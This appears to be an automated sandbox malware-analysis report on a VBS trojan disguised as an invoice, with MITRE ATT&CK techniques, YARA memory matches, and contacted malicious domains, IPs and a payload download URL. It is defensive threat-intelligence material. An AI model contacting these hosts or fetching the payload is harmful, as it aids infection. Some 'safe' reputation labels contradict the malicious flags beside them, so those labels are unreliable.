Source: Yara match	File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	713 Process Injection	221 Scripting	1 Credential API Hooking	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	4 Obfuscated Files or Information	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 PowerShell	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	12 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Credential API Hooking	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rootkit	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	713 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
WWVN_INVOICE_8363567453.vbs	24%	ReversingLabs	Script.Trojan.Valyria

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://barsam.com.au/bin_FCWtLoO90.binzs	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	Avira URL Cloud	safe
http://www.repaircilinic.com/wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp	0%	Avira URL Cloud	safe
http://www.linqxw.com/Accident_Lawyers.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf	0%	Avira URL Cloud	safe
http://barsam.com.au/bin_FCWtLoO90.binf	0%	Avira URL Cloud	safe
https://outlook.comjU	0%	Avira URL Cloud	safe
http://www.borneadomicile.com/wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)	0%	Avira URL Cloud	safe
http://www.repaircilinic.com/wn19/	0%	Avira URL Cloud	safe
http://barsam.com.au/bin_FCWtLoO90.bink	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.linqxw.com/wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/arrow.png)	0%	Avira URL Cloud	safe
http://barsam.com.au/bin_FCWtLoO90.bin	0%	Avira URL Cloud	safe
http://barsam.com.au/bin_FCWtLoO90.bin4	0%	Avira URL Cloud	safe
http://www.schnellekreditfinanz.com/wn19/	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/libgh.png)	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/logo.png)	0%	Avira URL Cloud	safe
https://contoso.com/	0%	Avira URL Cloud	safe
www.shantelleketodietofficial.site/wn19/	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix	0%	Avira URL Cloud	safe
http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRR	0%	Avira URL Cloud	safe
http://www.linqxw.com/px.js?ch=1	0%	Avira URL Cloud	safe
http://www.linqxw.com/px.js?ch=2	0%	Avira URL Cloud	safe
http://www.linqxw.com/wn19/	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)	0%	Avira URL Cloud	safe
http://www.linqxw.com/song_lyrics.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%2	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot	0%	Avira URL Cloud	safe
https://www.msn.	0%	Avira URL Cloud	safe
http://www.linqxw.com/Healthy_Weight_Loss.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSy	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	100%	Avira URL Cloud	malware
http://www.getsuzamtir.xyz/wn19/	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
http://www.clickleaser.com/wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp	0%	Avira URL Cloud	safe
http://www.linqxw.com	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	Avira URL Cloud	safe
http://www.clickleaser.com/wn19/	0%	Avira URL Cloud	safe
http://www.linqxw.com/find_a_tutor.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%	0%	Avira URL Cloud	safe
http://www.linqxw.com/Designer_Apparel.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf	0%	Avira URL Cloud	safe
http://www.dujh.xyz/	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf	0%	Avira URL Cloud	safe
http://www.dujh.xyz/wn19/?AVnXAh=a63aDXt/KdVd8/vhoA3n5O0XH1EsSnoV0YHdqlzRS6BKHLBCb088tgqJ	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/libg.png)	0%	Avira URL Cloud	safe
http://barsam.com.au/bin_FCWtLoO90.binC:	0%	Avira URL Cloud	safe
http://www.linqxw.com/Work_from_Home.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff	0%	Avira URL Cloud	safe
http://www.linqxw.com/Contact_Lens.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%	0%	Avira URL Cloud	safe
http://go.microsoft.c	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff	0%	Avira URL Cloud	safe
http://go.microsoft.ce	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/js/min.js?v2.3	0%	Avira URL Cloud	safe
http://www.linqxw.com/display.cfm	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2	0%	Avira URL Cloud	safe
http://barsam.com.au/	0%	Avira URL Cloud	safe
http://www.schnellekreditfinanz.com/wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2	0%	Avira URL Cloud	safe
https://mozilla.org0	0%	Avira URL Cloud	safe
http://www.borneadomicile.com/wn19/	0%	Avira URL Cloud	safe
http://purlorg/dc/elements/1.1/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.dujh.xyz	180.76.247.231	true	true	unknown
www.borneadomicile.com	217.160.0.18	true	true	unknown
schnellekreditfinanz.com	68.65.122.211	true	true	unknown
www.repaircilinic.com	185.53.179.171	true	true	unknown
dual-a-0001.a-msedge.net	13.107.21.200	true	false	unknown
www.getsuzamtir.xyz	199.192.29.215	true	true	unknown
e-0009.e-msedge.net	13.107.5.88	true	false	unknown
barsam.com.au	203.170.86.89	true	true	unknown
www.linqxw.com	209.99.40.222	true	true	unknown
www.clickleaser.com	198.23.49.173	true	true	unknown
www.shantelleketodietofficial.site	unknown	unknown	true	unknown
www.schnellekreditfinanz.com	unknown	unknown	true	unknown
www.tandelawnmaintenance.com	unknown	unknown	true	unknown
www.revboxx.com	unknown	unknown	true	unknown
www.actu-infomail.com	unknown	unknown	true	unknown
www.thebeautystore.store	unknown	unknown	true	unknown
www.projectduckling.com	unknown	unknown	true	unknown
www.gpusforfun.com	unknown	unknown	true	unknown
www.liesdevocalist.store	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.repaircilinic.com/wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp	true	Avira URL Cloud: safe	unknown
http://www.borneadomicile.com/wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp	true	Avira URL Cloud: safe	unknown
http://www.repaircilinic.com/wn19/	true	Avira URL Cloud: safe	unknown
http://barsam.com.au/bin_FCWtLoO90.bin	true	Avira URL Cloud: safe	unknown
http://www.schnellekreditfinanz.com/wn19/	true	Avira URL Cloud: safe	unknown
www.shantelleketodietofficial.site/wn19/	true	Avira URL Cloud: safe	low
http://www.linqxw.com/wn19/	true	Avira URL Cloud: safe	unknown
http://www.getsuzamtir.xyz/wn19/	true	Avira URL Cloud: safe	unknown
http://www.clickleaser.com/wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp	true	Avira URL Cloud: safe	unknown
http://www.clickleaser.com/wn19/	true	Avira URL Cloud: safe	unknown
http://www.schnellekreditfinanz.com/wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp	true	Avira URL Cloud: safe	unknown
http://www.borneadomicile.com/wn19/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000001C.00000000.2244298074.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1907825476.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp	false		high
http://barsam.com.au/bin_FCWtLoO90.binzs	ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/ClassId	explorer.exe, 0000001C.00000000.2205065965.00000000050E0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1831648228.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754749899.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243796340.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com/Accident_Lawyers.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://barsam.com.au/bin_FCWtLoO90.binf	ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.comjU	explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp	false		high
http://barsam.com.au/bin_FCWtLoO90.bink	ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 0000001C.00000000.2218425440.000000000A580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715282286.0000000003060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2218349968.000000000A530000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com/wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/arrow.png)	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-report	explorer.exe, 0000001C.00000000.2207491239.000000000527A000.00000004.00000001.00020000.00000000.sdmp	false		high
http://barsam.com.au/bin_FCWtLoO90.bin4	ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/pics/12471/libgh.png)	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/logo.png)	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRR	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.linqxw.com/px.js?ch=1	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com/px.js?ch=2	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/odirm%	explorer.exe, 0000001C.00000000.1796519211.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1726283312.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1874472316.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2211492035.00000000095D6000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com/song_lyrics.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%2	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.linqxw.com/Healthy_Weight_Loss.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSy	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crash-reports.mozilla.com/submit?id=	chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000000D.00000002.1798789622.0000000005835000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.linqxw.com/find_a_tutor.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com/Designer_Apparel.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dujh.xyz/	chkdsk.exe, 00000020.00000002.5743432574.0000000008260000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.foreca.com	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.dujh.xyz/wn19/?AVnXAh=a63aDXt/KdVd8/vhoA3n5O0XH1EsSnoV0YHdqlzRS6BKHLBCb088tgqJ	chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743515367.0000000008264000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/libg.png)	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 0000001C.00000000.2230893917.000000000D686000.00000004.00000001.00020000.00000000.sdmp	false		high
http://barsam.com.au/bin_FCWtLoO90.binC:	ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 0000001C.00000000.2231797627.000000000D823000.00000004.00000001.00020000.00000000.sdmp	false		high
